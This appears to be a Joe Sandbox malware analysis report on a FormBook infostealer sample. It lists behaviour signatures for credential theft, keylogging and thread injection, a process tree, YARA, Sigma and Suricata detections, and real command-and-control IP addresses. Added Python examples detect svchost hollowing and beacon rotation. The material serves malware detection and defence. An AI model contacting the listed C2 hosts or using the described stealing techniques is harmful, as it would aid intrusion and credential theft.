
Windows Analysis Report
9MZZG92yMO.exe

Overview

General Information

Sample name: 9MZZG92yMO.exe (renamed because the original name is a hash value)
Original sample name: c3435c7d8eb6822ff755dd1f48266e8bc267a8d8b87fee7a4ebe8ec8efdd1c30.exe
Analysis ID: 1588022
MD5: 7f427f12cd43c97f6647a6a39735eba8
SHA1: b6e68860ffd9fddf9e3248b0d89365eab8e4310c
SHA256: c3435c7d8eb6822ff755dd1f48266e8bc267a8d8b87fee7a4ebe8ec8efdd1c30
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 9MZZG92yMO.exe (PID: 4200 cmdline: "C:\Users\user\Desktop\9MZZG92yMO.exe" MD5: 7F427F12CD43C97F6647A6A39735EBA8)
    • svchost.exe (PID: 3568 cmdline: "C:\Users\user\Desktop\9MZZG92yMO.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • XBOIFKGKIWT.exe (PID: 5156 cmdline: "C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RmClient.exe (PID: 7148 cmdline: "C:\Windows\SysWOW64\RmClient.exe" MD5: CE765DCC7CDFDC1BFD94CCB772C75E41)
          • XBOIFKGKIWT.exe (PID: 2196 cmdline: "C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6528 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Memory dumps:
Source | Rule | Description | Author
00000006.00000002.4010406938.00000000026B0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.4010091145.00000000001B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.2453321754.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.4010291438.0000000002650000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.4011798777.0000000002E90000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(3 further entries not shown)

Unpacked PEs:
Source | Rule | Description | Author
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

                System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\9MZZG92yMO.exe", CommandLine: "C:\Users\user\Desktop\9MZZG92yMO.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\9MZZG92yMO.exe", ParentImage: C:\Users\user\Desktop\9MZZG92yMO.exe, ParentProcessId: 4200, ParentProcessName: 9MZZG92yMO.exe, ProcessCommandLine: "C:\Users\user\Desktop\9MZZG92yMO.exe", ProcessId: 3568, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\9MZZG92yMO.exe", CommandLine: "C:\Users\user\Desktop\9MZZG92yMO.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\9MZZG92yMO.exe", ParentImage: C:\Users\user\Desktop\9MZZG92yMO.exe, ParentProcessId: 4200, ParentProcessName: 9MZZG92yMO.exe, ProcessCommandLine: "C:\Users\user\Desktop\9MZZG92yMO.exe", ProcessId: 3568, ProcessName: svchost.exe
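Both Sigma matches above hinge on a single event: svchost.exe (PID 3568) was created by the sample and carries the sample's own command line, so the image name and the command line disagree and the parent is not services.exe. The Python below is an added example, not part of the Joe Sandbox report or of the Sigma rules it cites; it runs three plain checks over process-creation events laid out with the field names shown above (Image, CommandLine, ParentImage). The first event is transcribed from this report; the other two are constructed benign controls. Treating services.exe as the only expected svchost parent is an assumption for the example and needs site-specific exclusions in practice.

```python
import ntpath

# Process-creation events in the field layout of the Sigma matches above. The first is
# transcribed from this report; the other two are constructed benign controls.
EVENTS = [
    {"ProcessId": 3568, "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "CommandLine": r'"C:\Users\user\Desktop\9MZZG92yMO.exe"',
     "ParentProcessId": 4200, "ParentImage": r"C:\Users\user\Desktop\9MZZG92yMO.exe"},
    {"ProcessId": 1304, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule",
     "ParentProcessId": 724, "ParentImage": r"C:\Windows\System32\services.exe"},
    {"ProcessId": 5120, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" C:\Users\user\notes.txt',
     "ParentProcessId": 4016, "ParentImage": r"C:\Windows\explorer.exe"},
]

# Assumption for this example: services.exe is the only expected svchost parent.
# Real deployments add vendor-specific exclusions here.
EXPECTED_SVCHOST_PARENTS = {"services.exe"}


def _base(path):
    # ntpath handles Windows separators even when this runs on a non-Windows host.
    return ntpath.basename(path).lower()


def first_token(cmdline):
    """The executable token of a command line, with or without surrounding quotes."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def image_cmdline_mismatch(ev):
    """Image comes from CreateProcess's lpApplicationName, CommandLine from lpCommandLine;
    a normal launch names the same binary in both. PID 3568 above is svchost.exe carrying
    the sample's command line, the trace a hollowing loader leaves behind."""
    return _base(ev["Image"]) != _base(first_token(ev["CommandLine"]))


def uncommon_svchost_parent(ev):
    """svchost.exe is normally started by services.exe only."""
    return (_base(ev["Image"]) == "svchost.exe"
            and _base(ev["ParentImage"]) not in EXPECTED_SVCHOST_PARENTS)


def svchost_without_service_group(ev):
    """A genuine service host is told which service group to load with -k."""
    return _base(ev["Image"]) == "svchost.exe" and " -k " not in f" {ev['CommandLine']} "


CHECKS = [
    ("image_cmdline_mismatch", image_cmdline_mismatch),
    ("uncommon_svchost_parent", uncommon_svchost_parent),
    ("svchost_without_service_group", svchost_without_service_group),
]


def evaluate(events):
    """Map ProcessId -> list of triggered check names, only for events with a finding."""
    findings = {}
    for ev in events:
        hits = [name for name, check in CHECKS if check(ev)]
        if hits:
            findings[ev["ProcessId"]] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in evaluate(EVENTS).items():
        print(pid, ", ".join(hits))
```

Run as-is it reports only PID 3568, with all three checks triggered; the two benign controls produce nothing. The image/command-line mismatch is the most portable of the three, since it does not depend on the target process being svchost.exe.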
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T20:48:55.028761+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49985 | 134.122.133.80 | 80 | TCP
2025-01-10T20:49:18.456390+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49990 | 209.74.79.41 | 80 | TCP
2025-01-10T20:49:31.809809+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49995 | 104.21.112.1 | 80 | TCP
2025-01-10T20:49:46.967443+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49999 | 112.175.247.179 | 80 | TCP
2025-01-10T20:50:00.378766+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50004 | 194.9.94.86 | 80 | TCP
2025-01-10T20:50:13.690180+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50008 | 194.245.148.189 | 80 | TCP
2025-01-10T20:50:36.650582+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50012 | 208.91.197.27 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T20:48:55.028761+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49985 | 134.122.133.80 | 80 | TCP
2025-01-10T20:49:18.456390+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49990 | 209.74.79.41 | 80 | TCP
2025-01-10T20:49:31.809809+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49995 | 104.21.112.1 | 80 | TCP
2025-01-10T20:49:46.967443+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49999 | 112.175.247.179 | 80 | TCP
2025-01-10T20:50:00.378766+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50004 | 194.9.94.86 | 80 | TCP
2025-01-10T20:50:13.690180+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50008 | 194.245.148.189 | 80 | TCP
2025-01-10T20:50:36.650582+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50012 | 208.91.197.27 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T20:49:10.711109+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49987 | 209.74.79.41 | 80 | TCP
2025-01-10T20:49:13.275378+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49988 | 209.74.79.41 | 80 | TCP
2025-01-10T20:49:15.854514+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49989 | 209.74.79.41 | 80 | TCP
2025-01-10T20:49:24.122067+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49991 | 104.21.112.1 | 80 | TCP
2025-01-10T20:49:26.676734+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49993 | 104.21.112.1 | 80 | TCP
2025-01-10T20:49:29.242866+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49994 | 104.21.112.1 | 80 | TCP
2025-01-10T20:49:39.360380+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49996 | 112.175.247.179 | 80 | TCP
2025-01-10T20:49:41.906132+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49997 | 112.175.247.179 | 80 | TCP
2025-01-10T20:49:44.683696+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49998 | 112.175.247.179 | 80 | TCP
2025-01-10T20:49:52.737586+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50000 | 194.9.94.86 | 80 | TCP
2025-01-10T20:49:55.363011+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50001 | 194.9.94.86 | 80 | TCP
2025-01-10T20:49:57.836126+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50002 | 194.9.94.86 | 80 | TCP
2025-01-10T20:50:06.042071+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50005 | 194.245.148.189 | 80 | TCP
2025-01-10T20:50:08.595629+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50006 | 194.245.148.189 | 80 | TCP
2025-01-10T20:50:11.158931+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50007 | 194.245.148.189 | 80 | TCP
2025-01-10T20:50:28.269010+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50009 | 208.91.197.27 | 80 | TCP
2025-01-10T20:50:30.843005+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50010 | 208.91.197.27 | 80 | TCP
2025-01-10T20:50:33.461842+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50011 | 208.91.197.27 | 80 | TCP
2025-01-10T20:50:58.721485+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50013 | 76.223.67.189 | 80 | TCP
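Read per connection rather than per alert, the three tables above describe one check-in cycle per C2 server: three POST check-ins roughly 2.5 seconds apart, then a single GET (on which both GET rules fire, so it appears twice), then the next server in the list. The Python below is an added example and not part of the Joe Sandbox report; it carries the 26 flows transcribed from the tables, collapses alerts that fired on the same connection by source port, and derives the rotation order and the beacon cadence. The SID-to-method mapping is taken from the rule titles quoted in the Networking section of this report.

```python
from datetime import datetime
from statistics import median

# Flows transcribed from the Suricata alert tables above: (timestamp, source port, destination IP).
# The two GET rules (SIDs 2050745 and 2855465) fired on the same seven connections;
# the POST rule (SID 2855464) fired on nineteen others.
GET_FLOWS = [
    ("2025-01-10T20:48:55.028761+0100", 49985, "134.122.133.80"),
    ("2025-01-10T20:49:18.456390+0100", 49990, "209.74.79.41"),
    ("2025-01-10T20:49:31.809809+0100", 49995, "104.21.112.1"),
    ("2025-01-10T20:49:46.967443+0100", 49999, "112.175.247.179"),
    ("2025-01-10T20:50:00.378766+0100", 50004, "194.9.94.86"),
    ("2025-01-10T20:50:13.690180+0100", 50008, "194.245.148.189"),
    ("2025-01-10T20:50:36.650582+0100", 50012, "208.91.197.27"),
]
POST_FLOWS = [
    ("2025-01-10T20:49:10.711109+0100", 49987, "209.74.79.41"),
    ("2025-01-10T20:49:13.275378+0100", 49988, "209.74.79.41"),
    ("2025-01-10T20:49:15.854514+0100", 49989, "209.74.79.41"),
    ("2025-01-10T20:49:24.122067+0100", 49991, "104.21.112.1"),
    ("2025-01-10T20:49:26.676734+0100", 49993, "104.21.112.1"),
    ("2025-01-10T20:49:29.242866+0100", 49994, "104.21.112.1"),
    ("2025-01-10T20:49:39.360380+0100", 49996, "112.175.247.179"),
    ("2025-01-10T20:49:41.906132+0100", 49997, "112.175.247.179"),
    ("2025-01-10T20:49:44.683696+0100", 49998, "112.175.247.179"),
    ("2025-01-10T20:49:52.737586+0100", 50000, "194.9.94.86"),
    ("2025-01-10T20:49:55.363011+0100", 50001, "194.9.94.86"),
    ("2025-01-10T20:49:57.836126+0100", 50002, "194.9.94.86"),
    ("2025-01-10T20:50:06.042071+0100", 50005, "194.245.148.189"),
    ("2025-01-10T20:50:08.595629+0100", 50006, "194.245.148.189"),
    ("2025-01-10T20:50:11.158931+0100", 50007, "194.245.148.189"),
    ("2025-01-10T20:50:28.269010+0100", 50009, "208.91.197.27"),
    ("2025-01-10T20:50:30.843005+0100", 50010, "208.91.197.27"),
    ("2025-01-10T20:50:33.461842+0100", 50011, "208.91.197.27"),
    ("2025-01-10T20:50:58.721485+0100", 50013, "76.223.67.189"),
]
# Rule SID -> HTTP method named in the rule title (Networking section of this report).
SID_METHOD = {2050745: "GET", 2855465: "GET", 2855464: "POST"}
# Alerts as Suricata emitted them: one alert per (rule, flow), so every GET flow appears twice.
ALERTS = ([(ts, sid, sport, dst) for ts, sport, dst in GET_FLOWS for sid in (2050745, 2855465)]
          + [(ts, 2855464, sport, dst) for ts, sport, dst in POST_FLOWS])


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S.%f%z")


def dedupe_flows(alerts):
    """One record per TCP connection, keyed by the ephemeral source port: several rules
    firing on the same request must not be counted as several check-ins."""
    flows = {}
    for ts, sid, sport, dst in alerts:
        rec = flows.setdefault(sport, {"ts": _ts(ts), "dst": dst, "methods": set()})
        rec["methods"].add(SID_METHOD.get(sid, "?"))
    return sorted(flows.values(), key=lambda r: r["ts"])


def rotation_summary(alerts):
    """Destinations in first-contact order with their per-host method sequence, which
    exposes the 'three POSTs, one GET, then the next server' rotation."""
    hosts = {}
    for f in dedupe_flows(alerts):
        h = hosts.setdefault(f["dst"], {"dst": f["dst"], "sequence": [],
                                        "first": f["ts"], "last": f["ts"]})
        h["sequence"].append("/".join(sorted(f["methods"])))
        h["last"] = f["ts"]
    for h in hosts.values():
        h["posts"] = h["sequence"].count("POST")
        h["gets"] = h["sequence"].count("GET")
        h["span_s"] = round((h["last"] - h["first"]).total_seconds(), 3)
    return list(hosts.values())


def beacon_cadence_s(alerts):
    """Median gap between consecutive check-ins to the same server. A tight, regular
    cadence like this is what separates a beacon from a user browsing."""
    by_dst = {}
    for f in dedupe_flows(alerts):
        by_dst.setdefault(f["dst"], []).append(f["ts"])
    gaps = [(b - a).total_seconds() for ts in by_dst.values() for a, b in zip(ts, ts[1:])]
    return round(median(gaps), 3) if gaps else None


if __name__ == "__main__":
    for h in rotation_summary(ALERTS):
        print(f'{h["dst"]:16} {"->".join(h["sequence"]):24} span={h["span_s"]}s')
    print("median in-host cadence:", beacon_cadence_s(ALERTS), "s")
```

The first host (134.122.133.80) shows only a GET and the last (76.223.67.189) only a POST, which is what a capture window that starts and stops mid-cycle looks like; the six hosts in between each show the full POST, POST, POST, GET sequence.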


                AV Detection

Source: 9MZZG92yMO.exe | Virustotal: Detection: 54%
Source: 9MZZG92yMO.exe | ReversingLabs: Detection: 65%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4010406938.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4010091145.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2453321754.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4010291438.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4011798777.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4014572631.0000000004C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2454199303.0000000003720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2454931273.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 9MZZG92yMO.exe | Joe Sandbox ML: detected
Source: 9MZZG92yMO.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: RmClient.pdbGCTL | source: svchost.exe, 00000002.00000002.2453504721.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2453522622.0000000003212000.00000004.00000020.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000005.00000002.4010832786.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: XBOIFKGKIWT.exe, 00000005.00000002.4011137897.0000000000EFE000.00000002.00000001.01000000.00000005.sdmp, XBOIFKGKIWT.exe, 00000008.00000000.2522823189.0000000000EFE000.00000002.00000001.01000000.00000005.sdmp
Note: this PDB path sits in the image region of both XBOIFKGKIWT.exe instances (PIDs 5156 and 2196), which identifies the file under C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\ as a copy of the sandbox's own FakeChrome decoy browser rather than code shipped by the sample. The FormBook payload runs inside it by injection; compare the Yara matches on the 00000005 and 00000008 memory dumps.
Source: Binary string: wntdll.pdbUGP | source: 9MZZG92yMO.exe, 00000000.00000003.2175316459.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 9MZZG92yMO.exe, 00000000.00000003.2173408119.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358220983.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2454227225.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2454227225.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356378337.0000000003400000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4011500190.0000000002E2E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2452824167.0000000002936000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2457466949.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4011500190.0000000002C90000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: 9MZZG92yMO.exe, 00000000.00000003.2175316459.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 9MZZG92yMO.exe, 00000000.00000003.2173408119.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2358220983.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2454227225.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2454227225.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356378337.0000000003400000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, RmClient.exe, 00000006.00000002.4011500190.0000000002E2E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2452824167.0000000002936000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2457466949.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4011500190.0000000002C90000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: RmClient.exe, 00000006.00000002.4012231174.00000000032BC000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4010464904.000000000276D000.00000004.00000020.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000000.2523020110.00000000027FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2902094064.000000003A76C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: RmClient.exe, 00000006.00000002.4012231174.00000000032BC000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4010464904.000000000276D000.00000004.00000020.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000000.2523020110.00000000027FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2902094064.000000003A76C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: RmClient.pdb | source: svchost.exe, 00000002.00000002.2453504721.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2453522622.0000000003212000.00000004.00000020.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000005.00000002.4010832786.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_0052445A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_0052C6D1 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_0052C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_0052EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_0052F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_0052F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_005237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_00523B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_0052BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_001CC0D0 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_001B9EA0: 4x nop then xor eax, eax
Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02A304EE: 4x nop then mov ebx, 00000004h

                Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49995 -> 104.21.112.1:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 112.175.247.179:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49995 -> 104.21.112.1:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 112.175.247.179:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49988 -> 209.74.79.41:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50009 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 104.21.112.1:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50000 -> 194.9.94.86:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49990 -> 209.74.79.41:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49990 -> 209.74.79.41:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49991 -> 104.21.112.1:80
